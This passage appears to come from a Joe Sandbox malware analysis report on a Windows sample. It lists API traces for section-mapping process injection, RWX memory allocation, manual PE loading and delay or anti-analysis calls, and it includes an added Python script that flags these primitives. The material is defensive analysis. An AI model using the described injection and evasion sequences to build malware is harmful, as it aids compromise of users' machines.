                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F2
                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401723
                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401745
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2003769507.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_400000_tcgiwaf.jbxd
                                              Similarity
                                              • API ID: Section$View$Create$DuplicateObject
                                              • String ID:
                                              • API String ID: 1546783058-0
                                              • Opcode ID: b0195c2069dc6e331d8d87e09b392f04d65fbe6eaf74cb5c44d370e3a2e163ea
                                              • Instruction ID: 0dfbee2a1f0830b6acdc9e972913786be015a59f94024eee438c43ca1dd55f4f
                                              • Opcode Fuzzy Hash: b0195c2069dc6e331d8d87e09b392f04d65fbe6eaf74cb5c44d370e3a2e163ea
                                              • Instruction Fuzzy Hash: BA5139B1900249BFEF218F91CC49FEBBFB8EF86714F140159F951AA2A5D670A941CB24

                                               Control-flow Graph (function at 4015bc; graph rendered as text, summarised)
                                               • Entry blocks: 4015bc-4015c5; 4015ca (call 401207); 4015d0-4015de
                                               • From 4015e0 onward the blocks are the same as in the 401583 graph above (NtDuplicateObject at 401634, NtCreateSection at 401651 and 4016d1, NtMapViewOfSection at 401677, 40169a, 401707 and 40172e, failure exit at 401907, call 401755 at 401750)
                                              APIs
                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B1
                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F2
                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401723
                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401745
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2003769507.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_400000_tcgiwaf.jbxd
                                              Similarity
                                              • API ID: Section$View$Create$DuplicateObject
                                              • String ID:
                                              • API String ID: 1546783058-0
                                              • Opcode ID: cc208e499be32a7b8d2e1b8f44698ba7bae8291931bb2c7a737ae2018edfaae9
                                              • Instruction ID: 9e9cfe78a9b9fcbe8a20f4c56589f3f995e8910032e3214eb5438fd9bfe06916
                                              • Opcode Fuzzy Hash: cc208e499be32a7b8d2e1b8f44698ba7bae8291931bb2c7a737ae2018edfaae9
                                              • Instruction Fuzzy Hash: 855129B1900249BFEF218F91CC48FAFBBB8EF86B15F100159F951AA2A5D7709940CB20

                                               Control-flow Graph (function at 403054; graph rendered as text, summarised)
                                               • Basic blocks: 403054-403078; 40307e-403096; 40309c-4030ad; 4030af-4030b8; 4030bd-4030cb (loops on itself); 4030cd-4030d4; 4030d6-4030f5; 4030f6-4030fd; 4030ff-40311e; 40311f-403122; 403124-403127; 403129; 40312b; 40312d-403132; 403134-403137; 403139-403194 (RtlCreateUserThread, NtTerminateProcess); 403197-40319c (exit)
                                               • 4030af-40312b is a loop; only after it completes does control reach the RtlCreateUserThread / NtTerminateProcess block at 403139
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2003769507.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_400000_tcgiwaf.jbxd
                                              Similarity
                                              • API ID: CreateProcessTerminateThreadUser
                                              • String ID:
                                              • API String ID: 1921587553-0
                                              • Opcode ID: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
                                              • Instruction ID: bb3d83799e525a3431e0f051c565fd2002d42970a2b52bf5f395df3a052ac564
                                              • Opcode Fuzzy Hash: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
                                              • Instruction Fuzzy Hash: 9F412732618E0C4FD768EE6CA84966377D5E798311F1A43ABD809D7389EE30D85187C5

                                               Control-flow Graph (function at 56003c; graph rendered as text, summarised)
                                               • Basic blocks: 56003c-560047; 560049; 56004c-560263 (call 560a3f, call 560e0f, call 560d90, VirtualAlloc); 560265-560289 (call 560a69); 56028b-5602cc (loop); 5602ce-5603c2 (VirtualProtect, call 560cce, call 560ce7); 5603d1-560437 (loop, call 560ce7); 560439-5604b8 (VirtualFree); 5604be-5605ef (loop); 5605f4-56077a (nested loops); 56077f-56086c (loop); 56086e-5608be (LoadLibraryA); 5608c7-56091d
                                               • Reads as the allocate, protect, free, LoadLibraryA sequence of a manual PE mapper (the Strings entry below lists kernel32.dll)
                                              APIs
                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0056024D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2004791838.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_560000_tcgiwaf.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID: cess$kernel32.dll
                                              • API String ID: 4275171209-1230238691
                                              • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                              • Instruction ID: 27a86b14edabf9ade6a7e6052f94aea87cf6fba087f3c177ac7a62f14760164d
                                              • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                              • Instruction Fuzzy Hash: B2526874A01229DFDB64CF58C985BA9BBB1BF09304F1480D9E94DAB391DB30AE85DF14

                                               Control-flow Graph (function at 621c87; graph rendered as text, summarised)
                                               • Basic blocks: 621c87-621ca0; 621ca2-621ca4; 621ca6; 621cab-621cb7 (CreateToolhelp32Snapshot); 621cb9-621cbf; 621cc1-621cc5 (retries from 621ca2); 621cc7-621cd4 (Module32First); 621cd6-621cd7 (call 621946); 621cdc; 621cdd-621ce5
                                               • The snapshot is retried until it succeeds; Module32First then leads to the call of 621946, the VirtualAlloc routine
                                              APIs
                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00621CAF
                                              • Module32First.KERNEL32(00000000,00000224), ref: 00621CCF
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2004938818.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_610000_tcgiwaf.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFirstModule32SnapshotToolhelp32
                                              • String ID:
                                              • API String ID: 3833638111-0
                                              • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                              • Instruction ID: d96ec0932599499d2cbc8fdc8004e6e2413fe1abac97745c8f8bea4e814fe3f5
                                              • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                              • Instruction Fuzzy Hash: 27F0F635640B206FD7203BF5BC8CBAE72EDEF5A320F100528E642952C0CB74EC454E61

                                               Control-flow Graph (function at 560e0f; graph rendered as text, summarised)
                                               • Basic blocks: 560e0f-560e24 (SetErrorMode, SetErrorMode); 560e26; 560e2b-560e2c
                                              APIs
                                              • SetErrorMode.KERNELBASE(00000400,?,?,00560223,?,?), ref: 00560E19
                                              • SetErrorMode.KERNELBASE(00000000,?,?,00560223,?,?), ref: 00560E1E
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2004791838.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_560000_tcgiwaf.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorMode
                                              • String ID:
                                              • API String ID: 2340568224-0
                                              • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                              • Instruction ID: a5b931f4ea7891f8ec39f80adb89aa55d3030c8fd74fa9dfc01ba301779e0f72
                                              • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                              • Instruction Fuzzy Hash: 6CD0123154512877D7102A94DC09BCE7F1CDF05B62F008411FB0DD9080C771994046E5

                                              Control-flow Graph (basic blocks and edges; the executed/not-executed colouring of the original image is not preserved in text)
                                              • 244: 401919-40191a -> 245, 246
                                              • 245: 401969-4019c5, call 401207, Sleep, call 401482 -> 267, 268
                                              • 246: 40191d-401956, call 401207
                                              • 267: 4019d4-401a19 -> 278, 279
                                              • 268: 4019c7-4019cf, call 401583 -> 267
                                              • 278: 401a1c-401a25, call 401207
                                              • 279: 401a0f-401a15 -> 278
                                              APIs
                                              • Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2003769507.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_400000_tcgiwaf.jbxd
                                              Similarity
                                              • API ID: Sleep
                                              • String ID:
                                              • API String ID: 3472027048-0
                                              • Opcode ID: 2b935ac753e934015516d799e1095bac90694ea099bafde975148c207ca850c9
                                              • Instruction ID: 49835af623e861a6f2ddbc0bf662c5c40176c384461ea98b099af7f339eb22c4
                                              • Opcode Fuzzy Hash: 2b935ac753e934015516d799e1095bac90694ea099bafde975148c207ca850c9
                                              • Instruction Fuzzy Hash: 7911DCB234C201EBD6009A84A862E7A3214AB51359F304537FA57B90F2D57D9A13F76F

                                              Control-flow Graph (basic blocks and edges; the executed/not-executed colouring of the original image is not preserved in text)
                                              • 282: 401959-4019c5, call 401207, Sleep, call 401482 -> 296, 297
                                              • 296: 4019d4-401a19 -> 307, 308
                                              • 297: 4019c7-4019cf, call 401583 -> 296
                                              • 307: 401a1c-401a25, call 401207
                                              • 308: 401a0f-401a15 -> 307
                                              APIs
                                              • Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0
                                                • Part of subcall function 00401583: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                                • Part of subcall function 00401583: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                                • Part of subcall function 00401583: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2003769507.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_400000_tcgiwaf.jbxd
                                              Similarity
                                              • API ID: Section$CreateDuplicateObjectSleepView
                                              • String ID:
                                              • API String ID: 1885482327-0
                                              • Opcode ID: 973fe8c7f692c8164376a233d22da1c8e21a759768f578ec8ae17a8f290018c7
                                              • Instruction ID: 220a72f44c34cad911d214d6bf830d158092726683e2111099ccb198781fee4b
                                              • Opcode Fuzzy Hash: 973fe8c7f692c8164376a233d22da1c8e21a759768f578ec8ae17a8f290018c7
                                              • Instruction Fuzzy Hash: 1311BCB1648204FADA009A849C62E7A3228AB41754F204137BA47B90F1C57DA913EAAF

                                              Control-flow Graph (basic blocks and edges; the executed/not-executed colouring of the original image is not preserved in text)
                                              • 311: 401970-4019c5, call 401207, Sleep, call 401482 -> 323, 324
                                              • 323: 4019d4-401a19 -> 334, 335
                                              • 324: 4019c7-4019cf, call 401583 -> 323
                                              • 334: 401a1c-401a25, call 401207
                                              • 335: 401a0f-401a15 -> 334
                                              APIs
                                              • Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0
                                                • Part of subcall function 00401583: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                                • Part of subcall function 00401583: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                                • Part of subcall function 00401583: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2003769507.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_400000_tcgiwaf.jbxd
                                              Similarity
                                              • API ID: Section$CreateDuplicateObjectSleepView
                                              • String ID:
                                              • API String ID: 1885482327-0
                                              • Opcode ID: b0ddfabd172ae9c3cb26196b0cb86bb5accc73c170931bda3ffef6ca5bc85053
                                              • Instruction ID: edf3ac2f4a0a3dadc82130375ffc9a201d65d5ca35b25829e414e95522c05f9b
                                              • Opcode Fuzzy Hash: b0ddfabd172ae9c3cb26196b0cb86bb5accc73c170931bda3ffef6ca5bc85053
                                              • Instruction Fuzzy Hash: AA01C0B174C104EBDB009A84DC62E7A3214AF41704F204537BA57B91F1C53EAA23FB5B

                                              Control-flow Graph (basic blocks and edges; the executed/not-executed colouring of the original image is not preserved in text)
                                              • 338: 401977-4019c5, call 401207, Sleep, call 401482 -> 347, 348
                                              • 347: 4019d4-401a19 -> 358, 359
                                              • 348: 4019c7-4019cf, call 401583 -> 347
                                              • 358: 401a1c-401a25, call 401207
                                              • 359: 401a0f-401a15 -> 358
                                              APIs
                                              • Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0
                                                • Part of subcall function 00401583: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                                • Part of subcall function 00401583: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                                • Part of subcall function 00401583: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2003769507.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_400000_tcgiwaf.jbxd
                                              Similarity
                                              • API ID: Section$CreateDuplicateObjectSleepView
                                              • String ID:
                                              • API String ID: 1885482327-0
                                              • Opcode ID: 547ce1ee7459762dd25db0cd36bc5e4baa4f04934683c573935985333de64e11
                                              • Instruction ID: c889a794982209429869940d23560ef391d683eb1520a1ae8baa03dfc3eb9000
                                              • Opcode Fuzzy Hash: 547ce1ee7459762dd25db0cd36bc5e4baa4f04934683c573935985333de64e11
                                              • Instruction Fuzzy Hash: E601E1B1308100EBD7009B849C51ABA3614AF41314F20413BB957790E2C53EAA22EB5B

                                              Control-flow Graph (basic blocks and edges; the executed/not-executed colouring of the original image is not preserved in text)
                                              • 362: 401987-4019c5, call 401207, Sleep, call 401482 -> 373, 374
                                              • 373: 4019d4-401a19 -> 384, 385
                                              • 374: 4019c7-4019cf, call 401583 -> 373
                                              • 384: 401a1c-401a25, call 401207
                                              • 385: 401a0f-401a15 -> 384
                                              APIs
                                              • Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0
                                                • Part of subcall function 00401583: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                                • Part of subcall function 00401583: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                                • Part of subcall function 00401583: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2003769507.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_400000_tcgiwaf.jbxd
                                              Similarity
                                              • API ID: Section$CreateDuplicateObjectSleepView
                                              • String ID:
                                              • API String ID: 1885482327-0
                                              • Opcode ID: 48afa338b6eb4ead81a9d6383d5bdcf6d33ddda25fb9a1f4e9ca7df9d9b0c8b0
                                              • Instruction ID: 1aa0efa7bda459d32f82bf33ce90feabc7a2b43109eca8adeaaf204144b81d62
                                              • Opcode Fuzzy Hash: 48afa338b6eb4ead81a9d6383d5bdcf6d33ddda25fb9a1f4e9ca7df9d9b0c8b0
                                              • Instruction Fuzzy Hash: C201C0B1708104EBDB009A84DC62E7A3214AF41714F204137BA57791F1C53EAA23FB5B

                                              Control-flow Graph (basic blocks and edges; the executed/not-executed colouring of the original image is not preserved in text)
                                              • 388: 40198a-40199d -> 389, 390
                                              • 389: 4019a8-4019c5, Sleep, call 401482 -> 393, 394
                                              • 390: 4019a2, call 401207 -> 389
                                              • 393: 4019d4-401a19 -> 404, 405
                                              • 394: 4019c7-4019cf, call 401583 -> 393
                                              • 404: 401a1c-401a25, call 401207
                                              • 405: 401a0f-401a15 -> 404
                                              APIs
                                              • Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0
                                                • Part of subcall function 00401583: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                                • Part of subcall function 00401583: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                                • Part of subcall function 00401583: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2003769507.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_400000_tcgiwaf.jbxd
                                              Similarity
                                              • API ID: Section$CreateDuplicateObjectSleepView
                                              • String ID:
                                              • API String ID: 1885482327-0
                                              • Opcode ID: 66f4d7de36bf33a8276767325b567db769fa807301e16b4e03cd2b1c881b4aa0
                                              • Instruction ID: 93e9f4b763319a312fe66b3304ba82e0c9e14e36225fd67d869cb8e68c59c211
                                              • Opcode Fuzzy Hash: 66f4d7de36bf33a8276767325b567db769fa807301e16b4e03cd2b1c881b4aa0
                                              • Instruction Fuzzy Hash: 5501B572308244EBDB019F90DC92EAE3728AF45318F24017BB557790E2C53DA912EB1B

                                              Control-flow Graph (basic blocks and edges; the executed/not-executed colouring of the original image is not preserved in text)
                                              • 408: 621946-621980, call 621c59 -> 411, 412
                                              • 411: 621982-6219b5, VirtualAlloc, call 6219d3 -> 414
                                              • 412: 6219ce -> 412 (self-loop)
                                              • 414: 6219ba-6219cc -> 412
                                              APIs
                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00621997
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2004938818.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_610000_tcgiwaf.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                              • Instruction ID: e1565e21fd27825004f81731d3f870609084d435c3a895367f9cc0970ded4a5e
                                              • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                              • Instruction Fuzzy Hash: 42113C79A00208EFDB01DF98C985E99BFF5AF08351F158095F9489B362D371EA90DF80
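                                              The API bullets above (the SetErrorMode pair at 00560E19/00560E1E, the Sleep followed by the NtDuplicateObject/NtCreateSection/NtMapViewOfSection chain inside subcall 00401583, and the VirtualAlloc with PAGE_EXECUTE_READWRITE at 00621997) are exactly what a triage script keys on. The Python below is an added example written for this page, not Joe Sandbox code: it parses lines in this report's `• Api.MODULE(args), ref: addr` format and applies four rules of my own. The sample input is copied from the bullets above; the rule names, the 1000 ms sleep threshold, and the reading of the SetErrorMode(x)/SetErrorMode(0) pair as a return-value round-trip check against a hooked API are this example's assumptions, not findings stated by the report.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple, Union

# One Joe Sandbox "APIs" bullet, e.g.
#   • Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0
#   • Part of subcall function 00401583: NtCreateSection.NTDLL(...), ref: 00401670
#   • _realloc.LIBCMT ref: 004036F1          (no argument list at all)
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# Win32 constants the rules compare against.
MEM_COMMIT = 0x1000
PAGE_EXECUTE_READWRITE = 0x40
LONG_SLEEP_MS = 1000  # assumed threshold for a delay worth flagging

Arg = Union[int, str, None]  # hex value, literal string argument, or Joe's '?'


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Arg]
    ref: int
    subcall_of: Optional[int] = None


def _parse_arg(token: str) -> Arg:
    token = token.strip()
    if token == "?":
        return None  # value the sandbox could not resolve
    try:
        return int(token, 16)
    except ValueError:
        return token  # string argument such as the 'foyagili' job-object name


def parse_api_lines(text: str) -> List[ApiCall]:
    """Extract every API bullet from a block of report text, in order."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [_parse_arg(t) for t in raw.split(",")] if raw else []
        sub = m.group("sub")
        calls.append(ApiCall(
            api=m.group("api"),
            module=m.group("mod"),
            args=args,
            ref=int(m.group("ref"), 16),
            subcall_of=int(sub, 16) if sub else None,
        ))
    return calls


def detect(calls: List[ApiCall]) -> List[Tuple[str, int]]:
    """Return (rule_name, ref_address) pairs for the primitives present."""
    findings = []
    by_name = {c.api: c for c in calls}

    # Rule 1: a section is created and then mapped; this is the usual
    # alternative to WriteProcessMemory for placing code in another process.
    if "NtCreateSection" in by_name and "NtMapViewOfSection" in by_name:
        findings.append(("section_mapping_injection", by_name["NtMapViewOfSection"].ref))

    # Rule 2: VirtualAlloc(.., MEM_COMMIT, PAGE_EXECUTE_READWRITE): RWX memory
    # is the typical landing zone for an unpacked stage.
    for c in calls:
        if c.api == "VirtualAlloc" and len(c.args) >= 4:
            alloc_type, protect = c.args[2], c.args[3]
            if isinstance(alloc_type, int) and alloc_type & MEM_COMMIT and protect == PAGE_EXECUTE_READWRITE:
                findings.append(("rwx_virtualalloc", c.ref))

    # Rule 3 (assumed reading): SetErrorMode(x) immediately followed by
    # SetErrorMode(0). On an unhooked API the second call returns x, so code
    # that compares the return value with x can spot a hooked/emulated kernel32.
    for prev, cur in zip(calls, calls[1:]):
        if prev.api == cur.api == "SetErrorMode" and prev.args and cur.args:
            if isinstance(prev.args[0], int) and prev.args[0] != 0 and cur.args[0] == 0:
                findings.append(("seterrormode_roundtrip", cur.ref))

    # Rule 4: a long Sleep ahead of the injection chain.
    for c in calls:
        if c.api == "Sleep" and c.args and isinstance(c.args[0], int) and c.args[0] >= LONG_SLEEP_MS:
            findings.append(("long_sleep", c.ref))
    return findings


# Constructed input: the API bullets copied from the report entries above.
SAMPLE = """
• SetErrorMode.KERNELBASE(00000400,?,?,00560223,?,?), ref: 00560E19
• SetErrorMode.KERNELBASE(00000000,?,?,00560223,?,?), ref: 00560E1E
• Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0
  • Part of subcall function 00401583: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
  • Part of subcall function 00401583: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
  • Part of subcall function 00401583: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
• VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00621997
• _realloc.LIBCMT ref: 004036F1
• OpenJobObjectW.KERNEL32(00000000,00000000,foyagili), ref: 0040372F
"""

if __name__ == "__main__":
    for rule, ref in detect(parse_api_lines(SAMPLE)):
        print(f"{rule:28s} ref {ref:08X}")
```

Run against the sample, the script reports the section-mapping chain at 00401693, the RWX allocation at 00621997, the SetErrorMode round trip at 00560E1E and the 5000 ms Sleep at 004019B0. Arguments Joe could not resolve stay as None, so a rule never matches on a guessed value; string arguments are kept verbatim rather than forced into integers.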
                                              APIs
                                              • SetLastError.KERNEL32(00000000), ref: 004036C1
                                              • DefineDosDeviceA.KERNEL32(00000000,?,00000000), ref: 004036E9
                                              • _realloc.LIBCMT ref: 004036F1
                                              • OpenJobObjectW.KERNEL32(00000000,00000000,foyagili), ref: 0040372F
                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040373A
                                              • _strlen.LIBCMT ref: 00403752
                                              • _abort.LIBCMT ref: 0040377E
                                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 004037DA
                                              • GetTickCount.KERNEL32 ref: 004037F0
                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 00403837
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.4143833215.0000000000402000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.4143781084.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143804647.0000000000401000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143833215.000000000041E000.00000020.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143895137.000000000044B000.00000008.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143919671.000000000045D000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_tcgiwaf.jbxd
                                              Similarity
                                              • API ID: ExchangeInterlocked$AllocCountDefineDeviceErrorLastObjectOpenTickVirtual_abort_realloc_strlen
                                              • String ID: %s %f %c$Bq $foyagili$nodeteriyucanisi pivibuyasedigozudaruzezune rafuxinetisekipocovovavomikatan$rupajineligigepubofe$zoviticejawesawa${
                                              • API String ID: 1986831385-628290909
                                              • Opcode ID: 5f070e074a5e9741a15d25e6933d49c530d81da921c20e23a25216c3e6978ac5
                                              • Instruction ID: dbe9b3807635e8ccfe06713225267c25a69f231be5d888f18942a88b2e388c8e
                                              • Opcode Fuzzy Hash: 5f070e074a5e9741a15d25e6933d49c530d81da921c20e23a25216c3e6978ac5
                                              • Instruction Fuzzy Hash: B59135F19403509FD700AF64ED49F9A7BA8A744706F01453AF644772E2C7BCAA44CBAE
                                              APIs
                                              • SetFileAttributesW.KERNEL32(00000000,00000000), ref: 00403347
                                              • GetCommMask.KERNEL32(00000000,00000000), ref: 0040338A
                                              • GetNumberFormatW.KERNEL32(00000000,00000000,panigalixamadigagorov sowojacekiludumidige polocemor,00000000,?,00000000), ref: 004033B7
                                              • GetLogicalDriveStringsA.KERNEL32(00000000,?), ref: 004033C2
                                              • VerifyVersionInfoW.KERNEL32(?,00000000,00000000,00000000), ref: 004033D5
                                              • GetComputerNameA.KERNEL32(?,?), ref: 004033E6
                                              • ClearCommError.KERNEL32(00000000,00000000,00000000), ref: 004033F2
                                              • InterlockedIncrement.KERNEL32(?), ref: 004033FC
                                              • EnumTimeFormatsA.KERNEL32(00000000,00000000,00000000), ref: 00403404
                                              • GetTempFileNameA.KERNEL32(00000000,?,00000000,00000000), ref: 00403417
                                              • _memset.LIBCMT ref: 0040342C
                                              • CommConfigDialogW.KERNEL32(00000000,00000000,?), ref: 0040343C
                                              • ReadConsoleInputA.KERNEL32(00000000,?,00000000,?), ref: 00403451
                                              • GetVersionExW.KERNEL32(?), ref: 0040345E
                                              • CreateActCtxW.KERNEL32(?), ref: 0040346B
                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 00403477
                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00403483
                                              • GetShortPathNameW.KERNEL32(00000000,?,00000000), ref: 00403494
                                              • GetCurrencyFormatW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 004034A6
                                              • GetLocaleInfoW.KERNEL32(00000000,00000000,?,00000000), ref: 004034B9
                                              • InterlockedIncrement.KERNEL32(?), ref: 004034C3
                                              • SetVolumeMountPointA.KERNEL32(00000000,00000000), ref: 004034DB
                                              • GlobalUnWire.KERNEL32(00000000), ref: 004034E3
                                              • CreateSemaphoreW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00403518
                                              Strings
                                              • , xrefs: 00403309
                                              • panigalixamadigagorov sowojacekiludumidige polocemor, xrefs: 004033AE
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.4143833215.0000000000402000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.4143781084.0000000000400000.00000002.00000001.01000000.00000005.sdmp
